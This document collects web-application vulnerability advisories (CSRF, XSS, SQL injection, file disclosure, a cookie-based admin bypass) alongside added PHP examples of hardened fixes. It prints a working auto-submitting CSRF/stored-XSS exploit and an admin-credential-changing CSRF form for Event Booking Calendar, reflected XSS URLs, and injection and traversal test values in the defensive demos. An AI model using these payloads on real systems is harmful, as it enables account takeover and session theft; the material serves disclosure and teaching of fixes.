The first vulnerability is a Cross Site Request Forgery (CSRF) vulnerability which allows an attacker to add an admin user to the system. The second vulnerability is a Cross Site Scripting (XSS) vulnerability which allows an attacker to inject malicious JavaScript code into the system. The third vulnerability is a Local File Disclosure vulnerability which allows an attacker to download sensitive files from the system.
Vacation Packages Listing V2.0 is vulnerable to Cross Site Request Forgery and multiple Cross Site Scripting flaws. An attacker can exploit them by causing a crafted request to be sent to the vulnerable application; the forged request can add an admin user, and the injected script runs in the browser of users viewing the affected page. The severity of this vulnerability is high, with a CVSS score of 8.2.
A Cross Site Request Forgery (CSRF) vulnerability exists in Property Listing Script V2.0, which allows an attacker to add an admin user to the application. An attacker can craft a malicious HTML page containing a form with hidden fields that is submitted to the vulnerable application when a logged-in administrator visits the page. This adds an admin user to the application with the credentials specified in the form fields.
The Pet Listing Script V1.0 is vulnerable to Cross Site Request Forgery and multiple Cross Site Scripting flaws. The CSRF can be exploited by luring a logged-in user to a crafted HTML page whose form, built from hidden input fields, submits a request to the server. The XSS can be exploited by sending a request whose parameters contain a script tag with malicious JavaScript code; this can be used to steal the user's cookies and gain access to the application.
A double-query (error-based) SQL Injection vulnerability has been detected in the Collabtive web application. The application fails to sanitize user-supplied input in the 'id' parameter of the managetimetracker.php page. The user must be authenticated to exploit this vulnerability.
The first vulnerability exists due to insufficient filtering of the 'start' HTTP GET parameter passed to the '/lib/functions/d-load.php' script before it is used in the PHP fopen() function. A remote attacker can read the contents of arbitrary files on the target system with the privileges of the web server. The second vulnerability exists due to insufficient validation of the 'category' HTTP POST parameter passed to the '/download.php' script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.
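The two flaws above (and the Collabtive 'id' injection in the previous entry) are the same two mistakes: a user-controlled value reaches fopen() without being confined to a directory, and a user-controlled value is concatenated into SQL. The following PHP is an added example, not code from d-load.php, download.php or Collabtive: it shows a hardened path check and a prepared statement beside the vulnerable concatenation. The download directory, the files table, its columns and the function names are assumptions; the fixture files and the SQLite database are constructed in the script.

```php
<?php
// Added example, not the vulnerable applications' code. Hardened versions of the
// two patterns described in the advisory; table/column/path names are assumed.

declare(strict_types=1);

// --- 1. Local file disclosure: the 'start' parameter handed to fopen() ---------

// Resolve $requested inside $baseDir; return null if it names anything else.
function safe_download_path(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // 'start' is supposed to be one file name: refuse NUL bytes (realpath() throws
    // on them in PHP 8) and any directory separator up front.
    if ($requested === '' || strpbrk($requested, "\0/\\") !== false) {
        return null;
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    // realpath() is false for missing files and resolves ".." and symlinks, so the
    // prefix test below is done on the canonical path, not on the raw input.
    if ($full === false || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Constructed fixture: a temporary download directory holding one legitimate file.
$downloads = sys_get_temp_dir() . '/dload_' . bin2hex(random_bytes(4));
mkdir($downloads);
file_put_contents("$downloads/brochure.pdf", "%PDF-1.4 constructed sample\n");

foreach (['brochure.pdf', '..', '../../../etc/passwd', "brochure.pdf\0.txt", '/etc/passwd'] as $start) {
    $path = safe_download_path($downloads, $start);
    printf("%-30s => %s\n", json_encode($start), $path === null ? 'REJECTED' : 'serve ' . basename($path));
}
unlink("$downloads/brochure.pdf");
rmdir($downloads);

// --- 2. SQL injection: the 'category' (or 'id') parameter built into a query ----

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE files (id INTEGER PRIMARY KEY, category TEXT, name TEXT, public INTEGER)');
$db->exec("INSERT INTO files (category, name, public) VALUES ('brochures', 'summer.pdf', 1), ('internal', 'pricing.xls', 0)");

// Vulnerable pattern: the parameter is concatenated into the statement text, so a
// quote in the value changes the shape of the query.
function list_files_vulnerable(PDO $db, string $category): array
{
    $sql = "SELECT name FROM files WHERE public = 1 AND category = '$category'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: a prepared statement. The value is sent separately from the
// query text and can only ever be compared as a category name.
function list_files_safe(PDO $db, string $category): array
{
    $stmt = $db->prepare('SELECT name FROM files WHERE public = 1 AND category = ?');
    $stmt->execute([$category]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$payload = "x' OR 1=1 --";   // constructed injection value for the demonstration
print_r(list_files_vulnerable($db, $payload));
print_r(list_files_safe($db, $payload));
```

Run with the PHP CLI (pdo_sqlite enabled). Only "brochure.pdf" is served; the vulnerable query leaks the non-public row because the OR clause it was given overrides the public = 1 condition, while the prepared statement returns nothing for the same input. For a numeric parameter such as Collabtive's 'id', bind it with PDO::PARAM_INT after an explicit ctype_digit() check rather than relying on escaping.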
The vulnerability exists due to insufficient authentication when handling the "burden_user_rememberme" cookie parameter. A remote unauthenticated user can set the "burden_user_rememberme" cookie to "1" and gain administrative access to the application.
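The defect is that the cookie value is the credential, and the only value it is compared against is a constant. The PHP below is an added example, not the affected application's code: it puts a check of that shape beside a "remember me" design where the cookie carries a random selector and verifier, only a hash of the verifier is stored server-side, and comparison is constant-time. The cookie name is the advisory's; the store, its fields and the role values are assumptions.

```php
<?php
// Added example, not the vulnerable application's code. The flawed check (cookie
// value compared to a constant) beside a token-based remember-me store.

declare(strict_types=1);

// Vulnerable pattern: any client can set this cookie, so anyone is "admin".
function is_admin_vulnerable(array $cookies): bool
{
    return isset($cookies['burden_user_rememberme']) && $cookies['burden_user_rememberme'] == '1';
}

// Hardened pattern: cookie = "selector:verifier". The selector finds the row; the
// row holds sha256(verifier), so a leaked table does not yield usable cookies.
final class RememberMeStore
{
    /** @var array<string, array{user: string, role: string, hash: string, expires: int}> */
    private array $rows = [];

    // Called at login when the user ticks "remember me"; returns the cookie value.
    public function issue(string $user, string $role, int $ttl = 30 * 86400): string
    {
        $selector = bin2hex(random_bytes(12));
        $verifier = bin2hex(random_bytes(32));
        $this->rows[$selector] = [
            'user'    => $user,
            'role'    => $role,
            'hash'    => hash('sha256', $verifier),
            'expires' => time() + $ttl,
        ];
        return $selector . ':' . $verifier;
    }

    // Returns user and role, or null for a malformed, unknown, expired or forged cookie.
    public function authenticate(string $cookie): ?array
    {
        $parts = explode(':', $cookie, 2);
        if (count($parts) !== 2 || !ctype_xdigit($parts[0]) || !ctype_xdigit($parts[1])) {
            return null;
        }
        [$selector, $verifier] = $parts;
        $row = $this->rows[$selector] ?? null;
        if ($row === null || $row['expires'] < time()) {
            return null;
        }
        // hash_equals() does not short-circuit on the first differing byte.
        if (!hash_equals($row['hash'], hash('sha256', $verifier))) {
            return null;
        }
        return ['user' => $row['user'], 'role' => $row['role']];
    }
}

$store = new RememberMeStore();
$legit = $store->issue('admin', 'administrator');
$last  = substr($legit, -1);
$tampered = substr($legit, 0, -1) . ($last === '0' ? '1' : '0');   // one hex digit changed

// Constructed requests: the forged "1" from the advisory, a made-up selector,
// the genuine cookie, and the genuine cookie with its last digit altered.
foreach (['1', 'deadbeefdeadbeefdeadbeef:1', $legit, $tampered] as $cookie) {
    printf("vulnerable=%-5s hardened=%s\n",
        is_admin_vulnerable(['burden_user_rememberme' => $cookie]) ? 'admin' : 'no',
        json_encode($store->authenticate($cookie)));
}
```

In a real deployment the rows live in a database, the cookie is set with the Secure and HttpOnly flags, and issue() is called only after a password or other first-factor check has succeeded; the point of the example is that the server, not the client, decides which cookie values are valid.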
The CSRF is present in the CGI form used to create and modify users of the camera's web interface (/set_users.cgi). This CSRF would allow a malicious attacker to create users in the camera web interface (including administrator users) if he is able to lure the legitimate administrator of the camera into visiting a web page controlled by the attacker.
The Event Booking Calendar V2.0 is vulnerable to multiple Blind Injection, Cross Site Request Forgery and multiple Cross Site Scripting flaws. An attacker can exploit these vulnerabilities by sending malicious requests to the vulnerable website. For example, an attacker can send a request with a crafted URL containing an injection payload. The Cross Site Request Forgery vulnerability can be exploited with a crafted HTML form that sets a new admin username and password when a logged-in administrator visits the attacker's page. Finally, the Cross Site Scripting vulnerabilities can be exploited by sending a crafted form or URL containing malicious JavaScript code.
[1] Cross Site Scripting:

I. Persistent XSS (CSRF with XSS exploit):

<html><body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://SITE/index.php?controller=AdminExtras&action=create">
<input type="hidden" name="extra_create" value="1"/>
<input type="hidden" name="i18n[1][name]" value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="i18n[2][name]" value=""/>
<input type="hidden" name="i18n[3][name]" value=""/>
<input type="hidden" name="price" value="1000$"/>
<input type="hidden" name="per" value="booking"/>
<input type="hidden" name="count" value="1000$"/>
</form></body></html>

II. Non-Persistent XSS:

www.site.com/index.php?controller=AdminBookings&action=index&p_date=XSS
www.site.com/index.php?controller=AdminBookings&action=index&p_date="><script>alert(document.cookie);</script>"/>

[2] Cross Site Request Forgery (change admin username/password):

<html><body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/index.php?controller=AdminOptions&action=update">
<input type="hidden" name="options_update" value="1"/>
<input type="hidden" name="tab" value="1"/>
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="password"/>
<input type="hidden" name="value-enum-currency" value="USD|GBP|EUR::USD"/>
<input type="hidden" name="value-enum-date_format" value="d.m.Y|m.d.Y|Y.m.d|j.n.Y|n.j.Y|Y.n.j|d/m/Y|m/d/Y|Y/m/d|j/n/Y|n/j/Y|Y/n/j::d.m.Y"/>
<input type="hidden" name="value-enum-time_format" value="H:i|h:i A|g:i A::H:i"/>
<input type="hidden" name="value-enum-timezone" value="-12:00|-11:00|-10:00|-09:30|-09:00|-08:00|-07:00|-06:00|-05:00|-04:30|-04:00|-03:30|-03:00|-02:00|-01:00|+00:00|+01:00|+02:00|+03:00|+03:30|+04:00|+04:30|+05:00|+05:30|+05:45|+06:00|+06:30|+07:00|+08:00|+08:45|+09:00|+09:30|+10:00|+10:30|+11:00|+12:00|+12:45|+13:00|+14:00::+02:00"/>
</form></body></html>
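Every CSRF entry on this page (Vacation Packages Listing, Property Listing Script, Pet Listing Script, the camera's /set_users.cgi and the AdminOptions form above) works because the state-changing handler accepts any POST that arrives with the victim's session cookie, and every XSS entry works because a submitted value is echoed back unencoded. The PHP below is an added example, not code from Event Booking Calendar or any of the listed products: a minimal handler for the AdminExtras "create" action targeted by the exploit above, with a per-session synchronizer token that the cross-site form cannot supply, and HTML encoding on output. The controller and field names follow the exploit; the token helper, the form renderer and the $session array standing in for $_SESSION are assumptions so the script runs from the CLI.

```php
<?php
// Added example, not the application's code: CSRF token check plus output encoding
// for the AdminExtras create action. $session stands in for $_SESSION.

declare(strict_types=1);

// One 256-bit random token per session, created when first needed.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True only if the POST carries the session's token; comparison is constant-time.
function csrf_check(array $session, array $post): bool
{
    return isset($session['csrf_token'], $post['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

// HTML encoding for anything reflected or stored and later shown.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// The genuine admin form: the token travels as a hidden field the attacker's
// page cannot read (same-origin policy keeps the form's HTML from other sites).
function render_extra_form(array &$session): string
{
    return '<form method="POST" action="index.php?controller=AdminExtras&amp;action=create">'
        . '<input type="hidden" name="csrf_token" value="' . e(csrf_token($session)) . '"/>'
        . '<input type="text" name="i18n[1][name]"/><input type="submit"/></form>';
}

// Handler: returns the extra as it will be shown in the admin list, or an error.
function handle_extra_create(array $session, array $post): string
{
    if (!csrf_check($session, $post)) {
        return 'ERROR 403: missing or invalid CSRF token';
    }
    $name = (string)($post['i18n'][1]['name'] ?? '');
    // ... persist $name here; whenever it is displayed, encode it:
    return '<li>' . e($name) . '</li>';
}

// Constructed requests. $session is what a logged-in admin's session holds after
// the real form has been rendered once.
$session = [];
render_extra_form($session);

// 1. The cross-site form from the exploit: it sends exactly the fields the exploit
//    page sets, and no token, because the attacker never saw one.
$forged = ['extra_create' => '1', 'i18n' => [1 => ['name' => '<script>alert(document.cookie);</script>']]];
echo handle_extra_create($session, $forged), "\n";

// 2. The same payload through the genuine form (token present): accepted, stored,
//    but rendered as text rather than markup.
$legit = $forged + ['csrf_token' => $session['csrf_token']];
echo handle_extra_create($session, $legit), "\n";

// 3. The reflected case: p_date from the AdminBookings URL, encoded before echo.
$p_date = '"><script>alert(document.cookie);</script>"/>';
echo '<input type="text" name="p_date" value="' . e($p_date) . '"/>', "\n";
```

The same token check belongs on the AdminOptions update action (the username/password change above) and, in whatever language the device firmware uses, on the camera's /set_users.cgi. As defence in depth, issue the session cookie with session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]) so a browser does not attach it to a top-level cross-site POST in the first place; the token remains the primary control because SameSite does not cover every browser or every request shape.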